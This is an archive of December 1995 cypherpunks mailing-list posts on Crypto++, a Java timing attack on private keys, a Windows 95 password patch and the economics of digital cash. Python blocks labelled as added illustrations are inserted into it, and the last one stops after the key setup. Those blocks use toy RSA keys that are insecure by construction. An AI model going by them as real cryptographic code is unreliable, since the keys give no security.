Message-ID: <Pine.SUN.3.91.951218232411.13713B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I am looking for suggestions for features to include in the next version 
of Crypto++ (current version is 1.1, you can find it at 
http://www.eskimo.com/~weidai/cryptlib.html).

Major additions already planned/implemented include speed improvements,
Safer (all the variations), and elliptic curve cryptosystems (over prime
fields as well as fields of characteristic 2).  There is also a good
chance that RSA will be added back, but I'm still waiting for the final
word from the RSADSI lawyer. 

What else do people want to see?

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Tue, 19 Dec 1995 17:46:14 +0800
To: cypherpunks@toad.com
Subject: Re: redirect of newsgroups
In-Reply-To: <199512190221.VAA20286@homeport.org>
Message-ID: <Pine.A32.3.91.951219003649.70364A-100000@navajo.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> |      For those of us sitting behind a firewall that blocks out all of the 
> |      alt, rec, etc.. newsgroups...is there another way to access these 
> |      groups?  For example, redirecting the contents of alt.2600 to, say, 
> |      comp.2600 (because this firewall allows the comp.xxx groups through).  
> |      Or any other hacks around this inconvenience?

( im gonna work this back onto topic.. just watch. :)  ) 

There is a rather lengthy FAQ that explains about a zillion different 
ways to get your paws on whichever newsgroups you desire. It's called
"How to Receive Banned News Groups FAQ" and you can find it at:

http://www.cen.uiuc.edu/~jg11772/banned-groups-faq.html

(here it comes..)

In addition to covering topics relating to finding what you want in the 
way of usenet news, it also has a pretty well thought out anti-censorship 
rant towards the end, and gives pointers to some open NNTP servers, 
and freenets where you can obtain free access to usenet news. There is 
also a short list of mail to news gateways, which is useful if you would 
like to post to usenet via a remailer (or if your sysadmin censors which 
groups you have access to).

(Ok.. maybe not totally on topic.. i tried.. blegh)

have a day.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 19 Dec 1995 16:43:51 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Java and timing info - second attempt
In-Reply-To: <9512190402.AA12992@bilbo.suite.com>
Message-ID: <199512190712.CAA21135@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jim Miller writes:
> Combine this with a standard crypto API for doing Web-based digital  
> signatures or authentication or encryption and you may begin to see some  
> possibilities.
> 
> Would it be possible to create a Java applet that causes the client  
> machine to sign or encrypt something with their private key, and then send  
> back timing info?
> 
> For the answer to be YES a few things need to be true.  There needs to be  
> some sort of standard crypto API in use that can be accessed by a Java  
> script, and Java scripts need to be able to capture and send back timing  
> info.  Does anyone on this list know enough about Java to know if it can  
> do any of these things?

[I've read a bit more about Java since you last asked the question, 
coincidentally, but I don't know a huge amount about it yet.]

I think this scenario is certainly possible, from a technical point of view.

Crypto APIs in general should force the user to be aware of how she is using 
her key material. Ultimately you can't save people from themselves. (One
of my favorite non sequiturs. ;)  User education helps. But just as users
are tricked by various social engineering methods into divulging their account
passphrases, so they can be duped into encrypting or signing for a stranger's 
timing pleasure. 

However, one would certainly hope that the crypto Java interfaces that get
written are designed to mask timing information in the wake of Kocher. In
fact, this is precisely the sort of thing "we" should consider promulgating....

-Futplex <futplex@pseudonym.com>
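
What "masking timing information" can look like in a signing interface, as an added example that is not from the original post or from any library named in this thread: RSA blinding, so the private-key exponentiation never runs on a value the requester chose. The toy key built from two Mersenne primes and all function names are assumptions for illustration; Python's built-in `pow` is not constant-time, so this shows the blinding algebra only.

```python
import secrets
from math import gcd

# Constructed toy key: far too small and too structured for real use.
P, Q = 2**127 - 1, 2**89 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # private exponent


def modexp_counting(base, exp, mod):
    """Left-to-right square-and-multiply.

    Returns (result, multiplications performed). The count depends on the
    bits of the exponent, which is the kind of data-dependent work that
    shows up as timing variation.
    """
    result, mults = 1, 0
    for bit in bin(exp)[2:]:
        result = result * result % mod
        mults += 1
        if bit == "1":
            result = result * base % mod
            mults += 1
    return result, mults


def sign_unblinded(m):
    """Private-key operation applied directly to the caller's value."""
    return pow(m, D, N)


def sign_blinded(m, trace=None):
    """Private-key operation applied to m * r^E, with r fresh per call.

    (m * r^E)^D = m^D * r (mod N), so multiplying by r^-1 afterwards gives
    the same signature, while the exponentiation input is unpredictable to
    whoever supplied m. `trace`, if given, records that input for inspection.
    """
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            break
    blinded = m * pow(r, E, N) % N
    if trace is not None:
        trace.append(blinded)
    s_blinded = pow(blinded, D, N)
    return s_blinded * pow(r, -1, N) % N


if __name__ == "__main__":
    m = 0x1234567890ABCDEF  # constructed message representative
    seen = []
    s1, s2 = sign_blinded(m, seen), sign_blinded(m, seen)
    print("same signature:", s1 == s2 == sign_unblinded(m))
    print("same exponentiation input:", seen[0] == seen[1])
    print("mults for exponent 0b1111:", modexp_counting(5, 0b1111, 1000003)[1])
    print("mults for exponent 0b1000:", modexp_counting(5, 0b1000, 1000003)[1])
```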




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Tue, 19 Dec 1995 20:50:38 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Political Cleanup program [NOISE]
In-Reply-To: <199512190442.UAA14637@ix3.ix.netcom.com>
Message-ID: <Pine.3.89.9512190644.A19615-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Dec 1995, Bill Stewart wrote:
> I happen to believe in freedom of speech, especially political speech,
> and if you're not allowed to spend money broadcasting your speech or
> printing your messages, you don't have much freedom of press or speech.

This has somewhat undemocratic aspects when applied to political free 
speech. A person has ONE vote regardless of his wealth and as far as 
access to the political process this same principle must be maintained 
otherwise democracy is lost. 

At times freedoms for corporate entities and freedoms for individuals are 
at cross purposes, freedom for individuals must always be held in the 
higher position.

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
 (KEY id 1024/80E4AA05) email me for key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 20 Dec 1995 14:04:14 +0800
To: win95netbugs@lists.Stanford.EDU
Subject: ANNOUNCE: Windows 95 .PWL Security "Functionality Enhancement"
Message-ID: <Pine.ULT.3.91.951214212331.10286D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have been instructed that it is not a bug fix; it is a "Functionality 
Enhancement." Please note headers before replying -- you're probably in a 
Bcc field.

The patch for the problem we started discussing on November 1st is dated
yesterday, but no one outside Microsoft appears to have seen it until
today. pr/password.htm started forwarding to the patch distribution page
some time between 2PM and 7:30PM Pacific Time today (yes, I had hit
"reload"). 

 http://www.microsoft.com/windows/software/mspwlupd.htm
 http://www.windows.microsoft.com/software/mspwlupd.htm

Anyone who uses passwords for just about anything -- network servers, 
dialup networking, remote registry services -- should get this patch.

For a rough start at a technical discussion of the problem that this 
patch is supposed to solve, see http://www.c2.org/hackmsoft/ or the 
gopher list archive below.

The Web page says it uses a 128-bit key. Intriguing. Anyone seen the CJR, 
or is Microsoft exempt?

Microsoft had told various people that the new security algorithm would be
published in advance and reviewed by outside security experts, but I have
not been able to verify this. 

This was supposed to affect Windows for Workgroups as well; anyone know 
anything about that?

- -rich
 owner-win95netbugs@lists.stanford.edu
 ftp://ftp.stanford.edu/pub/mailing-lists/win95netbugs/
 gopher://quixote.stanford.edu/1m/win95netbugs
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNENt43DXUbM57SdAQG4xwP9EqXu5wXBOfpThtEUikqngrQNpe7RGKSv
FqNSlZnh6GKJff6zQnZ3GyH0lYU8Mg+ApJVmSeSxq3ApA5Oc+jTUW6B4RNm+bxfT
YBSThGmGbNNt948E/7oyXJdYVtWhuAleQtU7LxKNJfXoQlO/R05cc8O0zj7EiBR+
777AbiM201s=
=K2IQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JerelRobertson <jrober39@borg.com>
Date: Wed, 20 Dec 1995 13:59:14 +0800
To: cypherpunks@toad.com
Subject: mailing list
Message-ID: <199512150614.BAA05472@mail.borg.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey I want to get on this list.  How do I do it?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 20 Dec 1995 07:06:44 +0800
To: cypherpunks@toad.com
Subject: Re: PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
Message-ID: <199512191557.HAA10769@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On 18 Dec 1995, Ian Goldberg wrote:

> In article <199512151800.KAA11304@jobe.shell.portal.com>,
>  <anonymous-remailer@shell.portal.com> wrote:
> >On Mon, 11 Dec 1995, Michael Coates wrote:
> >
> >> PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
> >> Netscape Communications has awarded two software sleuths $1,000 each
> >> for finding security gaps in its Netscape Navigator 2.0 software.  The
> >> company also awarded gifts to 50 other contestants in its "Bugs Bounty" 
> >> program for identifying non-security problems.  (Wall Street Journal
> >> 11 Dec 95 B7)
> >
> >Can anyone tell me whether Ian Goldberg and David Wagner got their $25,000
> >from Netscape for finding the HUGE security flaws in Netscape's existing 
> >product line??
> >
> >I can't remember whether they got anything or not ...
> 
> That would be no (well, except for the nifty T-shirt from Sameer; Thanks!).

Not anything??  That's shameful ... where on earth are the values in 
America, today?  

AT&T and Netscape have jointly made a small fortune distributing this
product, and yet NEITHER company feels that the software engineers who
"voluntarily" made a difference -- a couple of students -- deserve
even a wooden nickel for the ideas which were used.

It's absolutely shameful.  But then, I guess that AT&T and Netscape
have no shame at all.

They just steal "intellectual property" from students, and don't even
pay a token amount.

And people wonder what's wrong with America?

>   - Ian "There's a reason people talk about `starving grad students'..."
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 20 Dec 1995 01:05:52 +0800
To: cypherpunks@toad.com
Subject: (fwd) Economics of Digital Money.
Message-ID: <v02120d03acfc6117eabd@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Tue, 19 Dec 1995 12:42:23 +0700 (GMT+0700)
From: Patiwat Panurach <pati@ipied.tu.ac.th>
To: ecash@digicash.com
Subject: Economics of Digital Money.
MIME-Version: 1.0
Sender: owner-ecash@digicash.com
Precedence: bulk
Reply-To: ecash@digicash.com

        The Economics of Digital Commerce: An analysis of
        Digital Cash, Electronic Fund Transfers, and eCash

By: Patiwat Panurach
Faculty of Economics
Thammasat University
Bangkok, Thailand


The extraordinary growth of international interconnected computer networks
and the pervasive trend of commerce to utilize these networks as a new field
for their operations has catalyzed the demand for new methods of payments.
These new methods must attain unprecedented levels of security, speed,
privacy, decentralization, and internationalization for digital commerce
to be accepted by both consumers and entrepreneurs.

This paper seeks to analyze 3 such methods of electronic payments.  First shall
be the generic type of electronic fund transfer that is widely in use.  Second,
the ongoing proposals for an open digital cash standard.  Lastly is a real
world technology currently in implementation called eCash.  These 3 methods
are examined in terms of the dynamics of transaction clearance, the effects on
money supply and the macroeconomy, their classification in terms of money
or cash, and the comparative viewpoints of monetary authorities, financial
institutions, and consumers.  This paper will not attempt to go into detail on
the myriad of encryption systems, protocols, algorithms and other technical
matters concerning the new systems.  These are all secondary aspects of
electronic payment.   As their basis, electronic payment systems are simply
logical evolutionary steps that began  with the realization of the limits of
barter.  The need to pay for  transactions is the root of all electronic
payment systems.

The first method of electronic payments that shall be examined  has been in use
for a relatively long time.  It is the electronic checking system.  For many,
Electronic Checking and Electronic Payment are the same thing, although
this is not always so.  Electronic Checking simply uses the  existing banking
structure to its fullest potential by eliminating paper checks.  Electronic
Checking is an extremely varied system.  Some examples of it include

... paying for university fees via ATM card
... paying telephone bills via monthly bank account deductions
... large value overseas fund transfers

Conceptually, Electronic Checking, and almost all Electronic Payments,
involves 3 agents1:

1. buyer
2. seller
3. intermediary

The buyer initiates a transaction with the seller and the seller demands
payment.  The buyer then obtains a unique certification of payment (physically
called a check) from the intermediary.  This debits the buyer's account with
the intermediary.  The buyer then gives the certification to the seller and the
seller gives the certification to the intermediary.  This credits  the seller's
account with the intermediary.

Schematically, this is a conventional checking transaction.  But when it is
conducted electronically, the certification is an electronic  flow that is
documented by the intermediary.  Most important, the  attainment of the
certification, the transfer of the certification, and  the debiting and
crediting of the accounts occurs instantaneously. If the buyer and seller
don't use the same intermediary, some standardized  clearing house system
between intermediaries is usually used.

Since electronic checking is essentially checking, it can be analyzed as
checking.  Payments made via electronic checking would be conducted outside
of cash and paper.  Instead of sending a check or paying at a counter, the
buyer would initiate an electronic checking certification.  If this is done
as a substitute for paying in cash, electronic checking could substantially
reduce the transactions demand for money.  In essence, this is not electronic
checking but electronic cash.  But if it is a substitute for conventional
checking, it would just increase the speed of the transaction.  From the
economic standpoint, there is no difference in the dynamics of the checking
process from normal checks
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 20 Dec 1995 00:30:33 +0800
To: cypherpunks@toad.com
Subject: (fwd) Economics of Digital Money. (part 2)
Message-ID: <v02120d05acfc6169fe0d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Tue, 19 Dec 1995 13:42:20 +0700 (GMT+0700)
From: Patiwat Panurach <pati@ipied.tu.ac.th>
To: ecash@digicash.com
Subject: Economics of Digital Money. (part 2)
MIME-Version: 1.0
Sender: owner-ecash@digicash.com
Precedence: bulk
Reply-To: ecash@digicash.com

        The Economics of Digital Commerce: An analysis of
        Digital Cash, Electronic Fund Transfers, and eCash

(the second part wasn't included for some reason)

The advantages of Electronic Checking over paper checks include

... Savings of time.  The instantaneous updating of account balances allows all
the financial players a greater deal of financial flexibility.  There is no
clearing period for transactions to be finished.  This allows large cost
reductions and more opportunities in cases of large-sum arbitration, and
allows even pedestrian players to have a great deal of financial freedom.
Also considerable is the savings in time.  Checks no longer have to be
cashed  and purchased at bank branches.

... Reduction in paper handling costs[2].  Universities are not overwhelmed with
paper  checks at the beginning of each term; banks aren't faced with
unmanageable  lines of people at every payday; governments don't need
large check  printing and mailing facilities; fewer trees are sacrificed.

... No bounced checks.  Being simultaneous, the receiving of the certification
and the debiting and crediting of the accounts assures that no certification
can be made without having funds to back it up.  This  could be done
through an automatic check of account status before the  certification is
issued.  This is similar to the checking of the credit  limit before credit
card transactions are finalized.

... Flexibility.  Electronic checking is an extremely broad and generic
field.  It is used, in some form or the other, worldwide.  Nearly all
types of transactions can be conducted by using electronic checking.

Electronic checking bypasses the physical weaknesses of physical checks.
But it is still, in its essence, a check.  A critical weakness of this is
privacy.  All transactions must pass through the banking system[3].
Furthermore, the banking system is obligated to document the details of
every transaction that passes through it.  What is to prevent the bank
from selling or leaking such information to others?  This precludes a
possible infraction of personal civil liberties.  Such was the case of
Winai La-onsuwan, the man who was formally known as the monk Yantra.  His
illicit adventures in an Australian brothel were documented via American
Express receipts[4], and such evidence was critical in defrocking him.  An
even more frightening scenario would be if governments would demand access
or control over the electronic checking, or over electronic checking
records.  What would permit them from instantly forbidding, say, a
pregnant woman from buying cigarettes?  Electronic checking systems could
conceivably be a tool of "Big Brother" in gaining control over individual
lives.  As payment systems using electronic checking become more
pervasive, is it necessary to sacrifice the privacy and undocumentability of
Cash?

Many feel[5] that cash also has a role as an electronic payments system.  Such a
"digital cash" (as it is called by many adherents) would have to have the
essential characteristics[6] of cash from the consumer's perspective:

... Anonymity.  The buyer pays the seller.  Nobody, except the seller knows
the identity of the buyer or the details of the transaction.  In cases where
the buyer uses a sufficiently sophisticated pseudonym system, not even the
seller knows the identity of the buyer.  Besides those of the 2 agents, there
is no record of the transaction taking place.  The certification of payment is
the payment.  There is no transfer between accounts that banks could
analyze to discern the exact flow of funds.

... Liquidity.  Digital Cash must potentially be accepted by all concerned
economic agents as a method of payments.  For example, in the Global
Internet, the largest meta-network in existence, this would involve a
significant proportion of internet merchants accepting a digital cash, if it is
to be more than an electronic play-money.  In many pilot projects, there
must be a large threshold of affiliated merchants that are willing to
participate in accepting digital payment for the system to be successful.

On the institutional side, digital cash holds many advantages over
existing fiat money (cash).  These mainly involve the physical weaknesses
of cash.  First, Cash is highly risky to robbers.  Cash must be kept in
secure vaults and be guarded by security guards.  The more cash is held,
the greater the potential risk is.  Secondly, cash has high transport
costs.  Because physical mass is proportional with the amount of cash
held, large amounts of cash are difficult to store.  It has been estimated
that money handling costs of transporting cash in the US amount to over 60
billion US$ a year[7].  Lastly, the advent of high-quality color copiers
and counterfeiting methods[8] make government stores of cash insecure.  It
has been rumored that the United States Government waged economic warfare
against Iraq during the Persian Gulf War by flooding the country with
expertly counterfeited cash[9].

Digital Cash could conceivably have many forms.  These might include:

... Prepaid Cards.  Buyers could buy prepaid cards that will be accepted by
special sellers.  For example, phone cards act as surrogates for coins in the
payment of public phones.  The weakness of phone cards as digital cash is
in the liquidity of the medium: no one would accept a 100 Baht phone card
for the payment of a meal.  Electronic road toll payment systems also
suffer from the same weakness.  Recent pilot projects conducted in
Australia by VISA show more promise.  Prepaid and rechargeable cards
are accepted at the point-of-sale  of a variety of merchants.  Furthermore,
to increase the system's acceptability, the cost of point of sale terminals is
subsidized by VISA.  It is now possible to pay for a beer at the bar and a
hotel bill with the same card[10].  Proposals for incorporating cash functions
into multipurpose smart cards have been announced by the EMV
(Europay, Mastercard, Visa) consortium[11].  This would allow many
functions like SIMM, ATM, encryption/decryption, and digital cash to be
fitted onto a single card.

... Purely Electronic Systems.  Purely electronic digital cash would be devoid
of physical form.  This would make it useful for network and internetwork
transactions where the buyer and seller are physically apart.  The payment
would take place by electronic deduction of digital cash from the buyer
and sending it to the seller.  The actual transfer of digital cash is usually
encrypted so that only the intended recipient (the seller) could make use of
the cash.  However, methods of anonymity and security must be in place,
as to not turn fully electronic systems into electronic checking systems.

In all its forms, digital cash is not always cash.  If, say, a financial
institution were to issue the digital cash, the creation of digital cash
could simply be considered a withdrawal from that financial institution.
Similarly, the financial institution would be obliged to credit user
accounts for deposits of digital cash.  The digital cash would not have to
have any real funds to back it, other than any legal reserve limit for the
original deposits.  Digital cash could just be considered as cash on
calculations of money supply.

$$ M1 = \frac{1 + (\text{Currency}/\text{Deposits})}{\text{LRR} + (\text{Currency}/\text{Deposits}) + (\text{Excess reserves}/\text{Deposits})} \times MB $$

when Currency encapsulates cash, coins, and digital cash.

Withdrawing digital cash reduces the amount of deposits that the financial
institution could use to extend loans, thus reducing any dynamic money
creation effects upon M1.

If, on the other hand, a non-financial firm were to issue digital cash, it
would simply be a purchase of 1 unit of digital-cash with 1 unit of
physical-cash.  It could only be backed up by the willingness of merchants
in accepting digital cash as a unit of payments.  This second type of
digital cash is inherently riskier for the consumer than the former.  It
is actually more analogous with coupons than with cash.  Furthermore,
redeeming paper cash for privately issued digital cash does not effect any
transformation upon the monetary conditions of the economy.  Buying this
type of digital cash does not affect the money creation process; there is
no decrease in the economy's loan creation capacity.


After considering the conceptual and theoretical aspects of electronic
checking and cash, it is now time to look at a real world example of
electronic payments: eCash is an open standard[12] electronic payments
system developed by the Digicash Company and currently being
implemented by the Mark Twain Bank of Missouri, USA.  Conceptually, eCash
is a type of digital cash, offering high levels of privacy and security.
Its current implementation by the Mark Twain Bank is not exclusive - any
bank licensing Digicash's eCash protocol could become an intermediary in
the eCash scheme.

To undertake transactions[13], both buyer and seller would have to have deposits
in the WorldCurrency Access accounts of the Mark Twain Bank.
WorldCurrency Access accounts are claimed to be conventional money
market accounts[14]; however, they do not pay interest nor have a fixed maturity
period but are insured by the FDIC.  The buyer must instruct the Mark Twain
Bank to transfer funds from his WorldCurrency Access account into his
eCash Mint.  This Mint is a personal buffer account.  Funds in the Mint are
no longer deposits of the bank, and they are not insured.  At any time, the
buyer can order his computer to remotely interface with his Mint and withdraw
funds from the Mint into the buyer's hard disk drive on the buyer's personal
computer.  The format of the funds is now completely electronic: a series of
zeros and ones that is cryptographically secure and unique.  It might be useful
to consider the funds in the Mint and in the buyer's hard disk as being
electronic in an electronic wallet.

To make the payment, the buyer encrypts the appropriate amount of eCash
with a suitably secure encryption protocol[15] and sends the eCash to the
seller.  The eCash can be sent to the seller by any data communications
medium, e.g., email, ftp, shttp.  Ironically, eCash can even be saved onto
a disk, and the disk sent to the seller.  Or it can be printed out onto
paper, and the printed copy sent to the seller.  The seller receives the
eCash and after decrypting it, stores it into his computer.  This can
then be sent to the Mint, and transferred into the seller's WorldCurrency
Access account.  The net result is a decrease in the buyer's funds and an
increase in the seller's.

eCash is private: although the Mark Twain Bank will have records for each
eCash withdrawal and deposit[16], it is impossible (mathematically
impossible[17], not just computationally difficult or improbable) to trace
any subsequent uses of that eCash.  If the user's hard disk drive should
crash, the eCash is lost forever[18].  But although eCash is purely
electronic, and can easily be copied, it is impossible (again,
mathematically impossible, by the explicit design of the eCash protocol
specification) to use any eCash twice[19].

Given its nature, eCash must be considered to be cash from the monetary
standpoint.  eCash withdrawals from the user's account are leakages from the
money creation process, in the same way that cash withdrawals are.  If a user's
WorldCurrency Access account had $100 in it, and $50 was withdrawn as
eCash, only $50 (minus any legal reserve limit and excess reserve) could be
lent out to others.  Conversely, a $50 eCash deposit would give the Mark
Twain Bank $50 (again, minus any legal reserve limit and excess reserves) to
lend out.

Now let us examine some common tendencies of all types of electronic
payment.  First is the long term trend to increase velocity of money flow
in the economy.  As the growth of the credit card industry (actually a
subset of electronic funds transfer) has shown us, increased convenience
of payment is a large factor in increasing the number of payments made.
As electronic payments become more widespread for the consumer, we might
expect similar long term trends of increased price level and output
through velocity.  Also, the disembodiment of cash also tends to give
illusions as to its value.  Transforming money from bills in your wallet
into charged electrons in your hard disk is probably a greater
abstractative leap than the transformation from gold coins to fiat
currency.  As another evolutionary step in the development of money, we
might expect consumers to reexamine their conceptions of money, cash, and
value.  Another significant impact has stemmed out of research into the
root of interest gaps in the money market.  Citicorp has claimed that
around 2/5 of the interest charged on a consumer finance loan is in branch
delivery and management costs.  This cost could be reduced substantially
with increased adoption of electronic means of payments.  It has been
estimated that the interest differentials in the money market could be
drastically reduced with adoption.

After examining these three electronic payments systems and their impacts,
it should be noted that no single system is best.  Which system is
adopted depends largely on the needs of the transaction and the agents.
On the consumer's side, survey data[20] shows that the single most important
factor is wide acceptance of the system.  Thus it may be that any system,
whether it is formally standardized and secured or not, could gain market
dominance and remain in that position by virtue of its ad-hoc standard.
Sellers would use it because most customers use it; customers would use it
because most sellers use it.  The main channel for competition would not
be in price of the system, but in gaining exclusive rights to the point of
sale of a large number of merchants.  This environment would make
electronic payments widely available in a relatively short time span, but
is not exactly conducive to diversity or technological advancement.  This
would be analogous with the entrenched tri-opoly of Visa, Mastercard, and
American Express in the credit card market.

An alternative to this situation might be the wide adoption of an open standard
electronic payment system.  In this case, any intermediary would jointly adopt
an interoperable system, whereby the client of one system could
transparently conduct transactions with any other seller whose intermediary
uses the same system.  This would be similar to the openness and competition
in Thailand's ATM system, where the 2 main ATM consortiums (ATM Pool
and BankNet) support an open system.  The holder of a Bangkok Bank ATM
card can withdraw money from, say, a Thai Farmers Bank ATM.

Such an open electronic payment system would have several  advantages over a
proprietary electronic payment system.

... Choice.  Users could be given better choice and services.  Since there
could be several intermediaries vying for the same open market, they
would have to use a policy of differentiation.  Such a structure would bring
about a monopolistic competition type market, the "market" being the
market for open-standard electronic payments.  Hopefully, this
differentiation would be for the benefit of users.

... Policy.  Government policy implementation would be less ambiguous.
Generally, the fewer heterogeneous systems there are to regulate, the more
effective government policy would be on each system.  This is because
each system would need a specific interpretation of the applicable laws.
Since in most nations, the legislative process can't enact new laws with
high speed, the "applicable laws" tend to be arcane and controversial.
Combined with the constrained capacity of the state, this might cause an
ambiguous period of years before systems can be finalized.  The ambiguity
during this period can kill off enthusiasm for new systems, leading confused
agents to return to conventional paper methods of payment.  It could also
lead to market distortions, as misguided governments could give
anti-competition concessions to single firms.

... Simplicity.  Open standard electronic payments systems would provide a
consistency in payments from the user's side.  It is a general design
principle in computer-human interaction engineering that consistent
interfaces are synonymous with the efficiency of the system.  Survey data[21]
has shown that simplicity is the second most important aspect that is looked
for in an electronic payments system.  Thus the consistency of an open
standard would contribute to its wide adoption.

Despite the advantages of open standard electronic payments systems, it is
also likely that a variety of standards could simultaneously gain market
acceptance.  This would not be through conventional price competition, but
rather by seeking niches in the market.  For example, it is highly likely
that some form of electronic cash system will gain a market niche due to
its strong point of unquestionable privacy.  Besides the easily targetable
markets of "socially deviant" products like pornography (one of the most
popular products of the Global Internet) or weapons design (the users of
which tend to be very paranoid), it would also gain acceptance from users
who are uneasy with the fact that each and every one of their transactions
would be documented by the banking system.  Fear of such information
getting into the hands of the few (or the hands of the state) will most
probably cause users to move to a more private system.  Such concerns for
privacy and fear of powerful corporations have crystallized into the
cypherpunk and cyberpunk movements, small but vocal special interest
groups who are often listened to by governments[22].

Other niches might include government subsidized ones for the payment of
various state benefits.  The United States Department of Nutrition has
already implemented an advanced Virtual Food Stamp system in New York
City[23].  Groceries with a large portion of low-income customers are
required to install electronic payment systems at the point of sale.
Customers can buy their groceries without using cash, there being an
automatic transfer of funds from their food stamp account to the grocery's
account.  This system reduces long lines at government offices, eliminates
the black market in redeeming food stamps for cash, and significantly
reduces the shuffling of paper of all parties.  This system is used by
500,000 people and is favored over the old system by 94% of them.

Like any new technology, it would be impractical to think of the status of
electronic payments as clearly defined.  Although the technology has
existed for decades to implement many systems, they have just begun to
permeate into the everyday consumers' lives.  The number of merchants
accepting eCash numbers less than a hundred.  Card based electronic cash
systems have only been implemented in pilot projects in a handful of
cities over the globe.  Nevertheless, the trends of modern commerce,
driven by the weaknesses of traditional payments systems, point to the
eventual rise of electronic payments.  It is just a matter of time and
spirit.



Footnotes

1       from J. C. Wood and D. S. Smith Electronic Transfer of Government
Benefits Federal Reserve Bulletin V.77 N.4 April 1991

2       D. Gleason as quoted by S. Levy E-Money (That's what I want)
Wired V.2 N.12 as archived in
http://www.hotwired.com/wired/2.12/features/emoney.html on the internet

3       via Regulation E implementing the Electronic Funds Transfer Act of
1979 (15 U.S.C. 1693) as quoted in J. C. Wood and D. S. Smith, op. cit.

4       from the news group soc.culture.thai

5       As can be seen from the atmosphere of various sites on the internet.
Most explicit is the cypherpunks mailing list at cypherpunks@toad.com

6       These characteristics, and the mathematical theories that underpin them
were developed over several years in the cypherpunks mailing list and the
future culture mailing list at futurec@uafsysb.uark.edu

7       S. Levy op. cit.

8       S. Levy op. cit.

9       heard from the future culture mailing list, op. cit.

10      S. Levy The End of Money? Time 6 Nov 1995 P.38-44

11      announced in the cypherpunks mailing list

12      details of the protocol and messaging system were publicized in the
internet at http://www.digicash.com/ecash/protpublish.html

13      described in the eCash/Mark Twain Bank FAQ at
http://www.marktwain.com/digifaq.html and the eCash FAQ at
http://www.digicash.com/ecash/faq.html

14      This is claimed in the eCash/Mark Twain Bank FAQ.  But the same
document also states that WorldCurrency Access accounts do not earn interest
and have no fixed time periods.

15      PGP public key encryption is a highly popular de facto standard due to
its high security and its zero price.

16      This is to conform with conventional banking laws concerning the
documentation of transactions.

17      D. Chaum Showing credentials without identification: transferring
signatures between unconditionally unlinkable pseudonyms (Springer-Verlag,
Berlin) p.946-64 (Conference: Advances in Cryptology-AUSCRYPT '90
International Conference on Cryptology. Proceedings, Sydney 8-11 January
1990)

18      Just another incentive to backup data

19      the eCash protocol specification at
http://www.digicash.com/ecash/protpublish.html

20      from the internet money survey conducted by the Management School
at Imperial College.  Archived at
http://www.tu.ac.th/thammasat/pati/money.survey.results

21      See fn. 20

22      The Electronic Frontier Foundation has had close links with the Clinton
Administration.  The Cypherpunks mailing list catalyzed public protest that
eventually brought down the government supported Clipper Chip

23      See J. C. Wood and D. S. Smith, op. cit.



-------------------------------------------------------------------------------
Patiwat Panurach             Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics            -Johann W.Von Goethe
-------------------------------------------------------------------------------

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<
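
Added illustration, not part of the forwarded essay and not DigiCash's code: the essay's two claims about eCash (the bank records every withdrawal and deposit yet cannot trace a coin, and a copied coin cannot be spent twice) shown with a textbook Chaum blind RSA signature plus a spent-serial list. The toy key, all class and function names, and the choice of blind RSA with an online spent list as the model for eCash are assumptions of this example.

```python
import hashlib
import secrets
from math import gcd

# Constructed toy key (two Mersenne primes) so the demo runs instantly.
# Assumption: textbook RSA over a plain hash; far too weak for real money.
P, Q = 2**127 - 1, 2**89 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # bank's private exponent


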